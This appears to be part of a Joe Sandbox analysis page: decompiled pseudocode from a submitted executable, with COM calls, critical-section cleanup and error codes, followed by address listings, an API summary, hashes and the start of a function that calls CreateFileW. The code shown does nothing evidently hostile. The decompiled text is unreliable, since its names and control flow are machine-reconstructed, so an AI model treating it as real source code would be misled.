									 *((intOrPtr*)( *_t417))(_t417, 0x41b298, _t678 + 0x18);
									_t419 =  *(_t678 + 0x18);
									__eflags = _t419;
									if(_t419 == 0) {
										L57:
										__eflags = _t419;
										 *(_t678 - 4) = 5;
										if(_t419 != 0) {
											 *((intOrPtr*)( *_t419 + 8))(_t419);
										}
										_t537 =  *(_t671 + 0x14);
										 *(_t678 + 8) =  *(_t678 + 8) + 4;
										_t672 =  *(_t671 + 0x18);
										E004032A8(_t678 - 0x6c, 4);
										 *((intOrPtr*)(_t678 - 0x6c)) = 0x41b68c;
										 *(_t678 - 4) = 0x17;
										E004032A8(_t678 - 0x80, 4);
										 *((intOrPtr*)(_t678 - 0x80)) = 0x41b68c;
										 *(_t678 - 4) = 0x18;
										E00404327(_t678 - 0x6c, _t537);
										_t423 = E00404327(_t678 - 0x80, _t672);
										__eflags = _t672;
										if(_t672 <= 0) {
											L61:
											 *(_t678 - 0x10) =  *(_t678 - 0x10) & 0x00000000;
											__eflags = _t537;
											if(_t537 <= 0) {
												goto L94;
											}
											_t675 =  *((intOrPtr*)(_t678 - 0x34));
											do {
												_t580 =  *(_t661 + 0x1c);
												_t652 = 0;
												__eflags = _t580;
												if(_t580 <= 0) {
													L83:
													_t429 = _t423 | 0xffffffff;
													__eflags = _t429;
													L84:
													__eflags = _t429;
													if(_t429 < 0) {
														_t581 =  *(_t661 + 0x30);
														_t653 = 0;
														__eflags = _t581;
														if(_t581 <= 0) {
															L90:
															_t430 = _t429 | 0xffffffff;
															__eflags = _t430;
															L91:
															__eflags = _t430;
															if(_t430 < 0) {
																 *(_t678 - 4) = 0x17;
																E004042AD(_t678 - 0x80);
																 *(_t678 - 4) = 5;
																E004042AD(_t678 - 0x6c);
																 *(_t678 - 4) = 0x19;
																E004042AD(_t678 - 0xa8);
																 *(_t678 - 4) = 1;
																E004099BC(_t678 - 0xf8, __eflags);
																 *(_t678 - 4) =  *(_t678 - 4) & 0x00000000;
																DeleteCriticalSection(_t678 - 0x4c);
																E00403800(_t678 - 0x50);
																 *((intOrPtr*)(_t678 - 0x2c)) = 0x41b6c8;
																 *(_t678 - 4) = 0x1a;
																E004042D6();
																 *(_t678 - 4) =  *(_t678 - 4) | 0xffffffff;
																E004042AD(_t678 - 0x2c);
																_t373 = 0x80004005;
																goto L114;
															}
															_t589 =  *((intOrPtr*)(_t678 + 0x14));
															goto L93;
														}
														_t441 =  *((intOrPtr*)(_t661 + 0x34));
														while(1) {
															__eflags =  *_t441 - _t675;
															if( *_t441 == _t675) {
																break;
															}
															_t653 = _t653 + 1;
															_t441 = _t441 + 4;
															__eflags = _t653 - _t581;
															if(_t653 < _t581) {
																continue;
															}
															goto L90;
														}
														_t430 = _t653;
														goto L91;
													}
													_t430 =  *( *((intOrPtr*)(_t661 + 0x20)) + 4 + _t429 * 8);
													_t589 =  *((intOrPtr*)(_t661 + 0x48));
													goto L93;
												}
												_t440 =  *((intOrPtr*)(_t661 + 0x20));
												while(1) {
													__eflags =  *_t440 - _t675;
													if( *_t440 == _t675) {
														break;
													}
													_t652 = _t652 + 1;
													_t440 = _t440 + 8;
													__eflags = _t652 - _t580;
													if(_t652 < _t580) {
														continue;
													}
													goto L83;
												}
												_t429 = _t652;
												goto L84;
												L93:
												_t423 = E004039DF(_t678 - 0x6c, _t589 + _t430 * 8);
												 *(_t678 - 0x10) =  *(_t678 - 0x10) + 1;
												_t675 = _t675 + 1;
												__eflags =  *(_t678 - 0x10) - _t537;
												 *((intOrPtr*)(_t678 - 0x34)) = _t675;
											} while ( *(_t678 - 0x10) < _t537);
											goto L94;
										} else {
											do {
												_t423 = E004039DF(_t678 - 0x80,  *((intOrPtr*)(_t661 + 0x48)) +  *(_t678 + 0x10) * 8);
												 *(_t678 + 0x10) =  *(_t678 + 0x10) + 1;
												_t672 = _t672 - 1;
												__eflags = _t672;
											} while (_t672 != 0);
											goto L61;
										}
									}
									_t595 =  *(_t671 + 0xc);
									__eflags = _t595 - 0xffffffff;
									 *(_t678 - 0x10) = _t595;
									if(_t595 > 0xffffffff) {
										__eflags = _t419;
										 *(_t678 - 4) = 5;
										if(_t419 != 0) {
											 *((intOrPtr*)( *_t419 + 8))(_t419);
										}
										 *(_t678 - 4) = 0x13;
										E004042AD(_t678 - 0xa8);
										 *(_t678 - 4) = 1;
										E004099BC(_t678 - 0xf8, __eflags);
										 *(_t678 - 4) =  *(_t678 - 4) & 0x00000000;
										DeleteCriticalSection(_t678 - 0x4c);
										E00403800(_t678 - 0x50);
										 *((intOrPtr*)(_t678 - 0x2c)) = 0x41b6c8;
										 *(_t678 - 4) = 0x14;
										_t538 = 0x80004001;
										L103:
										E004042D6();
										 *(_t678 - 4) =  *(_t678 - 4) | 0xffffffff;
										E004042AD(_t678 - 0x2c);
										_t373 = _t538;
										goto L114;
									}
									_t538 =  *((intOrPtr*)( *_t419 + 0xc))(_t419,  *((intOrPtr*)(_t671 + 0x10)),  *(_t678 - 0x10));
									__eflags = _t538;
									if(_t538 != 0) {
										_t453 =  *(_t678 + 0x18);
										 *(_t678 - 4) = 5;
										__eflags = _t453;
										if(_t453 != 0) {
											 *((intOrPtr*)( *_t453 + 8))(_t453);
										}
										 *(_t678 - 4) = 0x15;
										E004042AD(_t678 - 0xa8);
										 *(_t678 - 4) = 1;
										E004099BC(_t678 - 0xf8, __eflags);
										_t287 = _t678 - 4;
										 *_t287 =  *(_t678 - 4) & 0x00000000;
										__eflags =  *_t287;
										DeleteCriticalSection(_t678 - 0x4c);
										E00403800(_t678 - 0x50);
										 *((intOrPtr*)(_t678 - 0x2c)) = 0x41b6c8;
										 *(_t678 - 4) = 0x16;
										goto L103;
									}
									_t419 =  *(_t678 + 0x18);
									goto L57;
									L94:
									_t673 =  *(_t678 - 0x14);
									 *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_t678 - 0x30)) + 0x70)))) + 8))(_t673,  *((intOrPtr*)(_t678 - 0x60)),  *((intOrPtr*)(_t678 - 0x74)));
									 *(_t678 - 4) = 0x17;
									E004042AD(_t678 - 0x80);
									 *(_t678 - 4) = 5;
									E004042AD(_t678 - 0x6c);
									_t674 = _t673 + 1;
									__eflags = _t674 -  *(_t678 - 0x18);
									 *(_t678 - 0x14) = _t674;
								} while (_t674 <  *(_t678 - 0x18));
								_t658 =  *((intOrPtr*)(_t678 - 0x30));
								_t669 = 0;
								goto L105;
							} else {
								goto L34;
							}
							while(1) {
								L34:
								_t676 =  *((intOrPtr*)( *((intOrPtr*)( *(_t678 + 0x18) + 0xc)) +  *(_t678 - 0x10) * 4));
								 *(_t678 + 0x10) = 0;
								 *(_t678 + 8) = 0;
								_push(0);
								_push( *((intOrPtr*)(_t676 + 4)));
								 *(_t678 - 4) = 0xa;
								_push( *_t676);
								_t462 = E004063BD(_t678 + 0x10, _t678 + 8, __eflags);
								_t539 = _t462;
								__eflags = _t539;
								if(_t539 != 0) {
									break;
								}
								 *(_t678 - 0x14) =  *(_t678 - 0x14) & _t462;
								__eflags =  *((intOrPtr*)(_t676 + 0x14)) - 1;
								 *(_t678 - 4) = 0xd;
								if( *((intOrPtr*)(_t676 + 0x14)) != 1) {
									L40:
									__eflags =  *(_t678 + 8);
									if( *(_t678 + 8) == 0) {
										_t471 =  *(_t678 + 0x10);
										 *(_t678 - 4) = 5;
										__eflags = _t471;
										if(_t471 != 0) {
											 *((intOrPtr*)( *_t471 + 8))(_t471);
										}
										 *(_t678 - 4) = 0x10;
										E004042AD(_t678 - 0xa8);
										 *(_t678 - 4) = 1;
										E004099BC(_t678 - 0xf8, __eflags);
										 *(_t678 - 4) =  *(_t678 - 4) & 0x00000000;
										DeleteCriticalSection(_t678 - 0x4c);
										E00403800(_t678 - 0x50);
										 *((intOrPtr*)(_t678 - 0x2c)) = 0x41b6c8;
										 *(_t678 - 4) = 0x11;
										E004042D6();
										_t237 = _t678 - 4;
										 *_t237 =  *(_t678 - 4) | 0xffffffff;
										__eflags =  *_t237;
										E004042AD(_t678 - 0x2c);
										goto L81;
									}
									E0040640D(_t678 - 0x14,  *(_t678 + 8));
									__eflags =  *((char*)(_t658 + 0x68));
									if(__eflags != 0) {
										E0040A0DE( *((intOrPtr*)(_t658 + 0x6c)), _t678, __eflags,  *(_t678 + 8));
									}
									L43:
									_push(_t678 - 0x14);
									E0040BAB0(_t658 + 0x78);
									_t482 =  *(_t678 - 0x14);
									 *(_t678 - 4) = 0xa;
									__eflags = _t482;
									if(_t482 != 0) {
										 *((intOrPtr*)( *_t482 + 8))(_t482);
									}
									_t483 =  *(_t678 + 8);
									 *(_t678 - 4) = 9;
									__eflags = _t483;
									if(_t483 != 0) {
										 *((intOrPtr*)( *_t483 + 8))(_t483);
									}
									_t484 =  *(_t678 + 0x10);
									 *(_t678 - 4) = 5;
									__eflags = _t484;
									if(_t484 != 0) {
										 *((intOrPtr*)( *_t484 + 8))(_t484);
									}
									 *(_t678 - 0x10) =  *(_t678 - 0x10) + 1;
									__eflags =  *(_t678 - 0x10) -  *(_t678 - 0x18);
									if(__eflags < 0) {
										continue;
									} else {
										goto L50;
									}
								}
								__eflags =  *((intOrPtr*)(_t676 + 0x18)) - 1;
								if( *((intOrPtr*)(_t676 + 0x18)) != 1) {
									goto L40;
								}
								_t626 =  *(_t678 + 0x10);
								__eflags = _t626;
								if(_t626 == 0) {
									_t490 =  *(_t678 + 8);
									 *(_t678 - 4) = 9;
									__eflags = _t490;
									if(_t490 != 0) {
										 *((intOrPtr*)( *_t490 + 8))(_t490);
										_t626 =  *(_t678 + 0x10);
									}
									__eflags = _t626;
									 *(_t678 - 4) = 5;
									if(_t626 != 0) {
										 *((intOrPtr*)( *_t626 + 8))(_t626);
									}
									 *(_t678 - 4) = 0xe;
									E004042AD(_t678 - 0xa8);
									 *(_t678 - 4) = 1;
									E004099BC(_t678 - 0xf8, __eflags);
									 *(_t678 - 4) =  *(_t678 - 4) & 0x00000000;
									DeleteCriticalSection(_t678 - 0x4c);
									E00403800(_t678 - 0x50);
									 *((intOrPtr*)(_t678 - 0x2c)) = 0x41b6c8;
									 *(_t678 - 4) = 0xf;
									_t668 = 0x80004001;
									goto L109;
								}
								E0040640D(_t678 - 0x14, _t626);
								__eflags =  *((intOrPtr*)(_t658 + 0x68)) - _t539;
								if(__eflags != 0) {
									E0040A0B9( *((intOrPtr*)(_t658 + 0x6c)), _t678, __eflags,  *(_t678 + 0x10));
								}
								goto L43;
							}
							_t463 =  *(_t678 + 8);
							 *(_t678 - 4) = 9;
							__eflags = _t463;
							if(_t463 != 0) {
								 *((intOrPtr*)( *_t463 + 8))(_t463);
							}
							_t464 =  *(_t678 + 0x10);
							 *(_t678 - 4) = 5;
							__eflags = _t464;
							if(_t464 != 0) {
								 *((intOrPtr*)( *_t464 + 8))(_t464);
							}
							 *(_t678 - 4) = 0xb;
							E004042AD(_t678 - 0xa8);
							 *(_t678 - 4) = 1;
							E004099BC(_t678 - 0xf8, __eflags);
							 *(_t678 - 4) =  *(_t678 - 4) & 0x00000000;
							DeleteCriticalSection(_t678 - 0x4c);
							E00403800(_t678 - 0x50);
							 *((intOrPtr*)(_t678 - 0x2c)) = 0x41b6c8;
							 *(_t678 - 4) = 0xc;
							_t668 = _t539;
							goto L109;
						} else {
							 *(_t678 - 4) = 7;
							E004042AD(_t678 - 0xa8);
							 *(_t678 - 4) = 1;
							E004099BC(_t678 - 0xf8, _t700);
							 *(_t678 - 4) =  *(_t678 - 4) & 0x00000000;
							DeleteCriticalSection(_t678 - 0x4c);
							E00403800(_t678 - 0x50);
							 *((intOrPtr*)(_t678 - 0x2c)) = 0x41b6c8;
							 *(_t678 - 4) = 8;
							L109:
							E004042D6();
							 *(_t678 - 4) =  *(_t678 - 4) | 0xffffffff;
							E004042AD(_t678 - 0x2c);
							L113:
							_t373 = _t668;
							goto L114;
						}
					}
					_t510 = E0040B753(_t678 - 0xf8, _t658 + 4);
					asm("sbb al, al");
					_t512 =  ~_t510 + 1;
					 *((char*)(_t678 + 0xb)) = _t512;
					if(_t512 == 0) {
						goto L51;
					}
					goto L21;
				} else {
					_t540 =  *((intOrPtr*)(_t678 + 0x14));
					do {
						_push(0x18);
						_t513 = E00403A76();
						if(_t513 == 0) {
							_t662 = 0;
							__eflags = 0;
						} else {
							 *(_t513 + 4) =  *(_t513 + 4) & 0x00000000;
							 *_t513 = 0x41b6e8;
							_t662 = _t513;
						}
						 *((intOrPtr*)(_t678 - 0x34)) = _t662;
						if(_t662 != 0) {
							 *((intOrPtr*)( *_t662 + 4))(_t662);
						}
						_push(0x28);
						 *((intOrPtr*)(_t662 + 8)) = _t678 - 0x50;
						 *((intOrPtr*)(_t662 + 0x10)) =  *((intOrPtr*)(_t678 + 0xc));
						 *(_t662 + 0x14) =  *(_t678 + 0x10);
						 *((intOrPtr*)(_t678 + 0xc)) =  *((intOrPtr*)(_t678 + 0xc)) +  *_t540;
						 *(_t678 - 4) = 2;
						asm("adc [ebp+0x10], ecx");
						_t518 = E00403A76();
						if(_t518 == 0) {
							_t677 = 0;
							__eflags = 0;
						} else {
							 *(_t518 + 4) =  *(_t518 + 4) & 0x00000000;
							 *(_t518 + 8) =  *(_t518 + 8) & 0x00000000;
							 *_t518 = 0x41b6d8;
							_t677 = _t518;
						}
						 *(_t678 - 0x18) = _t677;
						if(_t677 != 0) {
							 *((intOrPtr*)( *_t677 + 4))(_t677);
						}
						_t34 = _t677 + 8; // 0x8
						 *(_t678 - 4) = 3;
						E0040640D(_t34, _t662);
						 *(_t677 + 0x18) =  *(_t677 + 0x18) & 0x00000000;
						 *(_t677 + 0x1c) =  *(_t677 + 0x1c) & 0x00000000;
						 *(_t677 + 0x20) =  *(_t677 + 0x20) & 0x00000000;
						 *((intOrPtr*)(_t677 + 0x10)) =  *_t540;
						 *((intOrPtr*)(_t677 + 0x14)) =  *((intOrPtr*)(_t540 + 4));
						_push(_t678 - 0x18);
						E0040A5E4(_t678 - 0x2c);
						_t523 =  *(_t678 - 0x18);
						 *(_t678 - 4) = 2;
						if(_t523 != 0) {
							 *((intOrPtr*)( *_t523 + 8))(_t523);
						}
						 *(_t678 - 4) = 1;
						if(_t662 != 0) {
							 *((intOrPtr*)( *_t662 + 8))(_t662);
						}
						 *(_t678 + 8) =  *(_t678 + 8) + 1;
						_t540 = _t540 + 8;
					} while ( *(_t678 + 8) <  *((intOrPtr*)( *(_t678 + 0x18) + 0x30)));
					_t658 =  *((intOrPtr*)(_t678 - 0x30));
					goto L19;
				}
			}



























































                                          0x0040ad1e
                                          0x0040ad2b
                                          0x0040ad2f
                                          0x0040ad33
                                          0x0040ad3d
                                          0x0040b2d7
                                          0x0040b2d7
                                          0x0040b605
                                          0x0040b60b
                                          0x0040b613
                                          0x0040b613
                                          0x0040ad46
                                          0x0040ad4b
                                          0x0040ad57
                                          0x0040ad5a
                                          0x0040ad5d
                                          0x0040ad68
                                          0x0040ad6c
                                          0x0040ad74
                                          0x0040ad79
                                          0x0040ae60
                                          0x0040ae69
                                          0x0040ae6c
                                          0x0040ae6f
                                          0x0040ae7a
                                          0x0040ae7e
                                          0x0040ae8b
                                          0x0040ae8f
                                          0x0040ae97
                                          0x0040aeb6
                                          0x0040aeb9
                                          0x0040aebe
                                          0x0040aec1
                                          0x0040aec6
                                          0x0040aecb
                                          0x0040aece
                                          0x0040aece
                                          0x0040aed5
                                          0x0040aed7
                                          0x0040aedc
                                          0x0040aee2
                                          0x0040aee7
                                          0x0040aeeb
                                          0x0040aef6
                                          0x0040aef6
                                          0x0040aeed
                                          0x0040aeef
                                          0x0040aeef
                                          0x0040aefb
                                          0x0040aeff
                                          0x0040af02
                                          0x0040af07
                                          0x0040af0c
                                          0x0040af13
                                          0x0040af13
                                          0x0040af0e
                                          0x0040af0e
                                          0x0040af0e
                                          0x0040af15
                                          0x0040af15
                                          0x0040af26
                                          0x0040af28
                                          0x0040af2a
                                          0x0040af73
                                          0x0040af77
                                          0x0040af79
                                          0x0040b05f
                                          0x0040b069
                                          0x0040b06e
                                          0x0040b071
                                          0x0040b076
                                          0x0040b079
                                          0x0040b07b
                                          0x0040b07e
                                          0x0040b081
                                          0x0040b084
                                          0x0040b087
                                          0x0040b4bf
                                          0x0040b4d8
                                          0x0040b4dd
                                          0x0040b4e1
                                          0x0040b4e9
                                          0x0040b4e9
                                          0x0040b4ec
                                          0x0040b4ef
                                          0x0040b556
                                          0x0040b55b
                                          0x0040b56e
                                          0x0040b572
                                          0x0040b579
                                          0x0040b57b
                                          0x0040b57e
                                          0x0040b599
                                          0x0040b59f
                                          0x0040b5a9
                                          0x0040b5c2
                                          0x0040b5c4
                                          0x0040b5c8
                                          0x0040b5d3
                                          0x0040b5d7
                                          0x0040b5e2
                                          0x0040b5e6
                                          0x0040b5eb
                                          0x0040b5f2
                                          0x0040b5f7
                                          0x0040b5f7
                                          0x0040b5f7
                                          0x0040b5fe
                                          0x00000000
                                          0x00000000
                                          0x00000000
                                          0x00000000
                                          0x0040b580
                                          0x0040b580
                                          0x0040b58e
                                          0x0040b593
                                          0x0040b594
                                          0x0040b594
                                          0x00000000
                                          0x0040b4f1
                                          0x0040b4f7
                                          0x0040b4fb
                                          0x0040b506
                                          0x0040b50a
                                          0x0040b50f
                                          0x0040b517
                                          0x0040b520
                                          0x0040b525
                                          0x0040b52c
                                          0x0040b533
                                          0x0040b533
                                          0x00000000
                                          0x0040b533
                                          0x0040b4ef
                                          0x0040b08d
                                          0x0040b090
                                          0x0040b093
                                          0x0040b099
                                          0x0040b09d
                                          0x0040b0af
                                          0x0040b0bd
                                          0x0040b0c1
                                          0x0040b0c3
                                          0x0040b0c6
                                          0x0040b0c8
                                          0x0040b0f3
                                          0x0040b0f3
                                          0x0040b0f5
                                          0x0040b0f9
                                          0x0040b0fe
                                          0x0040b0fe
                                          0x0040b101
                                          0x0040b104
                                          0x0040b108
                                          0x0040b110
                                          0x0040b115
                                          0x0040b121
                                          0x0040b125
                                          0x0040b12a
                                          0x0040b135
                                          0x0040b139
                                          0x0040b142
                                          0x0040b147
                                          0x0040b149
                                          0x0040b163
                                          0x0040b163
                                          0x0040b167
                                          0x0040b169
                                          0x00000000
                                          0x00000000
                                          0x0040b16f
                                          0x0040b172
                                          0x0040b172
                                          0x0040b175
                                          0x0040b177
                                          0x0040b179
                                          0x0040b2e5
                                          0x0040b2e5
                                          0x0040b2e5
                                          0x0040b2e8
                                          0x0040b2e8
                                          0x0040b2ea
                                          0x0040b2f8
                                          0x0040b2fb
                                          0x0040b2fd
                                          0x0040b2ff
                                          0x0040b310
                                          0x0040b310
                                          0x0040b310
                                          0x0040b313
                                          0x0040b313
                                          0x0040b315
                                          0x0040b44a
                                          0x0040b44e
                                          0x0040b456
                                          0x0040b45a
                                          0x0040b465
                                          0x0040b469
                                          0x0040b474
                                          0x0040b478
                                          0x0040b47d
                                          0x0040b485
                                          0x0040b48e
                                          0x0040b493
                                          0x0040b49d
                                          0x0040b4a4
                                          0x0040b4a9
                                          0x0040b4b0
                                          0x0040b4b5
                                          0x00000000
                                          0x0040b4b5
                                          0x0040b31b
                                          0x00000000
                                          0x0040b31b
                                          0x0040b301
                                          0x0040b304
                                          0x0040b304
                                          0x0040b306
                                          0x00000000
                                          0x00000000
                                          0x0040b308
                                          0x0040b309
                                          0x0040b30c
                                          0x0040b30e
                                          0x00000000
                                          0x00000000
                                          0x00000000
                                          0x0040b30e
                                          0x0040b37e
                                          0x00000000
                                          0x0040b37e
                                          0x0040b2ef
                                          0x0040b2f3
                                          0x00000000
                                          0x0040b2f3
                                          0x0040b17f
                                          0x0040b182
                                          0x0040b182
                                          0x0040b184
                                          0x00000000
                                          0x00000000
                                          0x0040b18a
                                          0x0040b18b
                                          0x0040b18e
                                          0x0040b190
                                          0x00000000
                                          0x00000000
                                          0x00000000
                                          0x0040b192
                                          0x0040b2e1
                                          0x00000000
                                          0x0040b31e
                                          0x0040b325
                                          0x0040b32a
                                          0x0040b32d
                                          0x0040b32e
                                          0x0040b331
                                          0x0040b331
                                          0x00000000
                                          0x0040b14b
                                          0x0040b14b
                                          0x0040b158
                                          0x0040b15d
                                          0x0040b160
                                          0x0040b160
                                          0x0040b160
                                          0x00000000
                                          0x0040b14b
                                          0x0040b149
                                          0x0040b0ca
                                          0x0040b0cd
                                          0x0040b0d0
                                          0x0040b0d3
                                          0x0040b382
                                          0x0040b384
                                          0x0040b388
                                          0x0040b38d
                                          0x0040b38d
                                          0x0040b396
                                          0x0040b39a
                                          0x0040b3a5
                                          0x0040b3a9
                                          0x0040b3ae
                                          0x0040b3b6
                                          0x0040b3bf
                                          0x0040b3c4
                                          0x0040b3cb
                                          0x0040b3d2
                                          0x0040b42c
                                          0x0040b42f
                                          0x0040b434
                                          0x0040b43b
                                          0x0040b440
                                          0x00000000
                                          0x0040b440
                                          0x0040b0e6
                                          0x0040b0e8
                                          0x0040b0ea
                                          0x0040b3d9
                                          0x0040b3dc
                                          0x0040b3e0
                                          0x0040b3e2
                                          0x0040b3e7
                                          0x0040b3e7
                                          0x0040b3f0
                                          0x0040b3f4
                                          0x0040b3ff
                                          0x0040b403
                                          0x0040b408
                                          0x0040b408
                                          0x0040b408
                                          0x0040b410
                                          0x0040b419
                                          0x0040b41e
                                          0x0040b425
                                          0x00000000
                                          0x0040b425
                                          0x0040b0f0
                                          0x00000000
                                          0x0040b33a
                                          0x0040b340
                                          0x0040b34c
                                          0x0040b352
                                          0x0040b356
                                          0x0040b35e
                                          0x0040b362
                                          0x0040b367
                                          0x0040b368
                                          0x0040b36b
                                          0x0040b36b
                                          0x0040b374
                                          0x0040b377
                                          0x00000000
                                          0x00000000
                                          0x00000000
                                          0x00000000
                                          0x0040af7f
                                          0x0040af7f
                                          0x0040af88
                                          0x0040af8d
                                          0x0040af90
                                          0x0040af93
                                          0x0040af97
                                          0x0040af9d
                                          0x0040afa1
                                          0x0040afa3
                                          0x0040afa8
                                          0x0040afaa
                                          0x0040afac
                                          0x00000000
                                          0x00000000
                                          0x0040afb2
                                          0x0040afb5
                                          0x0040afb9
                                          0x0040afbd
                                          0x0040afeb
                                          0x0040afeb
                                          0x0040afef
                                          0x0040b270
                                          0x0040b273
                                          0x0040b277
                                          0x0040b279
                                          0x0040b27e
                                          0x0040b27e
                                          0x0040b287
                                          0x0040b28b
                                          0x0040b296
                                          0x0040b29a
                                          0x0040b29f
                                          0x0040b2a7
                                          0x0040b2b0
                                          0x0040b2b5
                                          0x0040b2bf
                                          0x0040b2c6
                                          0x0040b2cb
                                          0x0040b2cb
                                          0x0040b2cb
                                          0x0040b2d2
                                          0x00000000
                                          0x0040b2d2
                                          0x0040affb
                                          0x0040b000
                                          0x0040b004
                                          0x0040b00c
                                          0x0040b00c
                                          0x0040b011
                                          0x0040b017
                                          0x0040b018
                                          0x0040b01d
                                          0x0040b020
                                          0x0040b024
                                          0x0040b026
                                          0x0040b02b
                                          0x0040b02b
                                          0x0040b02e
                                          0x0040b031
                                          0x0040b035
                                          0x0040b037
                                          0x0040b03c
                                          0x0040b03c
                                          0x0040b03f
                                          0x0040b042
                                          0x0040b046
                                          0x0040b048
                                          0x0040b04d
                                          0x0040b04d
                                          0x0040b050
                                          0x0040b056
                                          0x0040b059
                                          0x00000000
                                          0x00000000
                                          0x00000000
                                          0x00000000
                                          0x0040b059
                                          0x0040afbf
                                          0x0040afc3
                                          0x00000000
                                          0x00000000
                                          0x0040afc5
                                          0x0040afc8
                                          0x0040afca
                                          0x0040b202
                                          0x0040b205
                                          0x0040b209
                                          0x0040b20b
                                          0x0040b210
                                          0x0040b213
                                          0x0040b213
                                          0x0040b216
                                          0x0040b218
                                          0x0040b21c
                                          0x0040b221
                                          0x0040b221
                                          0x0040b22a
                                          0x0040b22e
                                          0x0040b239
                                          0x0040b23d
                                          0x0040b242
                                          0x0040b24a
                                          0x0040b253
                                          0x0040b258
                                          0x0040b25f
                                          0x0040b266
                                          0x00000000
                                          0x0040b266
                                          0x0040afd4
                                          0x0040afd9
                                          0x0040afdc
                                          0x0040afe4
                                          0x0040afe4
                                          0x00000000
                                          0x0040afdc
                                          0x0040b197
                                          0x0040b19a
                                          0x0040b19e
                                          0x0040b1a0
                                          0x0040b1a5
                                          0x0040b1a5
                                          0x0040b1a8
                                          0x0040b1ab
                                          0x0040b1af
                                          0x0040b1b1
                                          0x0040b1b6
                                          0x0040b1b6
                                          0x0040b1bf
                                          0x0040b1c3
                                          0x0040b1ce
                                          0x0040b1d2
                                          0x0040b1d7
                                          0x0040b1df
                                          0x0040b1e8
                                          0x0040b1ed
                                          0x0040b1f4
                                          0x0040b1fb
                                          0x00000000
                                          0x0040af2c
                                          0x0040af32
                                          0x0040af36
                                          0x0040af41
                                          0x0040af45
                                          0x0040af4a
                                          0x0040af52
                                          0x0040af5b
                                          0x0040af60
                                          0x0040af67
                                          0x0040b535
                                          0x0040b538
                                          0x0040b53d
                                          0x0040b544
                                          0x0040b603
                                          0x0040b603
                                          0x00000000
                                          0x0040b603
                                          0x0040af2a
                                          0x0040aea2
                                          0x0040aea9
                                          0x0040aeab
                                          0x0040aead
                                          0x0040aeb0
                                          0x00000000
                                          0x00000000
                                          0x00000000
                                          0x0040ad7f
                                          0x0040ad7f
                                          0x0040ad82
                                          0x0040ad82
                                          0x0040ad84
                                          0x0040ad8c
                                          0x0040ad9c
                                          0x0040ad9c
                                          0x0040ad8e
                                          0x0040ad8e
                                          0x0040ad92
                                          0x0040ad98
                                          0x0040ad98
                                          0x0040ada0
                                          0x0040ada3
                                          0x0040ada8
                                          0x0040ada8
                                          0x0040adae
                                          0x0040adb0
                                          0x0040adb6
                                          0x0040adbc
                                          0x0040adc1
                                          0x0040adc7
                                          0x0040adcb
                                          0x0040adce
                                          0x0040add6
                                          0x0040adea
                                          0x0040adea
                                          0x0040add8
                                          0x0040add8
                                          0x0040addc
                                          0x0040ade0
                                          0x0040ade6
                                          0x0040ade6
                                          0x0040adee
                                          0x0040adf1
                                          0x0040adf6
                                          0x0040adf6
                                          0x0040adfa
                                          0x0040adfd
                                          0x0040ae01
                                          0x0040ae0b
                                          0x0040ae0f
                                          0x0040ae13
                                          0x0040ae17
                                          0x0040ae1d
                                          0x0040ae20
                                          0x0040ae24
                                          0x0040ae29
                                          0x0040ae2c
                                          0x0040ae32
                                          0x0040ae37
                                          0x0040ae37
                                          0x0040ae3c
                                          0x0040ae40
                                          0x0040ae45
                                          0x0040ae45
                                          0x0040ae48
                                          0x0040ae51
                                          0x0040ae54
                                          0x0040ae5d
                                          0x00000000
                                          0x0040ae5d

                                          APIs
                                          • __EH_prolog.LIBCMT ref: 0040AD1E
                                            • Part of subcall function 0040D7CC: __EH_prolog.LIBCMT ref: 0040D7D1
                                            • Part of subcall function 00413310: InitializeCriticalSection.KERNEL32(?,?,?,00000000,00000000), ref: 0041333E
                                          • DeleteCriticalSection.KERNEL32(?), ref: 0040AF52
                                          • DeleteCriticalSection.KERNEL32(?), ref: 0040B1DF
                                          • DeleteCriticalSection.KERNEL32(?), ref: 0040B24A
                                          • DeleteCriticalSection.KERNEL32(?), ref: 0040B2A7
                                          • DeleteCriticalSection.KERNEL32(?), ref: 0040B3B6
                                          • DeleteCriticalSection.KERNEL32(?), ref: 0040B410
                                          • DeleteCriticalSection.KERNEL32(?,?,?,00000004,00000004), ref: 0040B485
                                          • DeleteCriticalSection.KERNEL32(?), ref: 0040B517
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.536272591.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000000.00000002.536256554.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.536313306.000000000041B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.536345214.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.536365708.0000000000422000.00000008.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.536404853.0000000000423000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.536462702.0000000000427000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                          Similarity
                                          • API ID: CriticalSection$Delete$H_prolog$Initialize
                                          • String ID:
                                          • API String ID: 3452124646-0
                                          • Opcode ID: 5f6b8a8cdbdc89edeaeca9fb6a48680f4fe42b6689f54ac84f6a401f85157967
                                          • Instruction ID: 06aa0bffc57edc8446930be4fb3d3ecc4288fdccd94c57135405988f21593cb0
                                          • Opcode Fuzzy Hash: 5f6b8a8cdbdc89edeaeca9fb6a48680f4fe42b6689f54ac84f6a401f85157967
                                          • Instruction Fuzzy Hash: 5D625E7090024ADFDB14DFA4C944BDDBBB4EF14308F1480AEE815B72D2DB789A49DB99
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 004059B3 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 62fileCOMMON
                                          Download Yara Rule

                                          Control-flow Graph

                                          C-Code - Quality: 80%
                                          			E004059B3(void** __ecx) {
				signed int _t23;
				void* _t24;
				signed int _t26;
				intOrPtr* _t29;
				signed int _t31;
				void** _t50;
				void* _t52;
				intOrPtr _t57;

				E00413954(E00419734, _t52);
				_t57 =  *0x423148; // 0x1
				_t50 = __ecx;
				if(_t57 != 0) {
					_t23 = E00405A63(__ecx);
					__eflags = _t23;
					if(_t23 != 0) {
						_t14 = _t52 + 0x14; // 0x414be4
						_t24 = CreateFileW( *(_t52 + 8),  *(_t52 + 0xc),  *(_t52 + 0x10), 0,  *_t14,  *(_t52 + 0x18), 0); // executed
